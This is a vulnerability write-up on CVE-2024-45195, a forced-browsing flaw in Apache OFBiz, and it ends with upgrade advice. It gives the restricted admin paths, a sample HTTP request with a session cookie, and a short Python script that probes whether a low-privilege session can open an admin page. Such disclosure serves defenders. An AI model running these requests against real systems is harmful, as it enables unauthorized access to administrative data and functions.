CVE CyberSecurity Database News

CVE-2024-45195 - Direct Request ('Forced Browsing') Vulnerability in Apache OFBiz – How Attackers Could Access Restricted URLs

Poster -

CVE-2024-45195 is a newly disclosed "Direct Request" or "Forced Browsing" vulnerability that impacts Apache OFBiz—one of the most popular open-source enterprise resource management systems. This security flaw allows attackers to directly access restricted resources (like admin pages or sensitive API endpoints) simply by typing the correct URL, even if they're not supposed to. See the official CVE record.

OFBiz instances before version 18.12.16 are vulnerable, and users should upgrade to at least 18.12.16.

Let's break down how this works, how to replicate it, and what you should do to fix it.

Understanding 'Forced Browsing'

Forced Browsing (sometimes called "Insecure Direct Object Reference" or IDOR in some contexts) happens when an app or server doesn’t properly check if a user is allowed to view or interact with a specific resource. That means if someone changes the URL or guesses the location of a "hidden" page or API, they might get access—no hacking skills required.

Example Scenario

Let’s say OFBiz has an admin page at /control/admin meant only for administrators. Instead of showing an error when a normal user goes to that URL, the page loads anyway, revealing sensitive information or giving powerful actions to unauthorized users.

Step 1: Authenticate as Any User

Attackers register a normal user or use a low-privileged account.

Attackers simply try direct URLs like

- /control/ServerHit
- /control/EntitySyncList
- /control/Admin

Example Request

GET /control/ServerHit HTTP/1.1
Host: vulnerable-ofbiz-instance.com
Cookie: JSESSIONID=abcdefgh12345678

If the server responds with a regular 200 OK and the admin dashboard loads, the system has a forced browsing flaw.

Exploit Code Example

Here's a quick Python script (using requests) that tries accessing a restricted URL with a normal user's session:

import requests

# Replace with real credentials and target
url = 'https://vulnerable-ofbiz-instance.com/control/ServerHit';
session_cookie = {'JSESSIONID': 'abcdefgh12345678'}

# Optional: simulate a logged-in user session
response = requests.get(url, cookies=session_cookie)

if "Server Statistics" in response.text:
    print("Vulnerable! Access granted to restricted admin page.")
else:
    print("Access denied or not vulnerable.")

Note: You'd need a valid session cookie for an authenticated (but low-privilege) user for the above to work.

Why This Happened

Vulnerabilities like this usually result from a lack of "authorization checks." OFBiz was supposed to enforce access controls on certain URLs, but before version 18.12.16, these checks were missing or too weak in some places.

Mitigation – How to Fix

Upgrade to OFBiz 18.12.16 or later immediately:
The OFBiz project fixed this issue by adding the missing authorization checks. You can read the OFBiz security advisory for official details.

# Example: updating with git
git fetch origin
git checkout release18.12
git pull
# Rebuild OFBiz as per install docs

Also, review your custom plugins/pages and add explicit authorization checks, even after updating.

References and Resources

- NVD CVE-2024-45195 entry
- OFBiz Security Page
- Apache OFBiz Project
- About Forced Browsing
- Upgrade Instructions

Conclusion

CVE-2024-45195 is dangerously easy to exploit—attackers just need to know (or guess) URLs. If you run Apache OFBiz, upgrade to 18.12.16 without delay, and always verify that your sensitive URLs are protected with proper access checks.

Timeline

Published on: 09/04/2024 09:15:04 UTC
Last modified on: 09/06/2024 15:35:05 UTC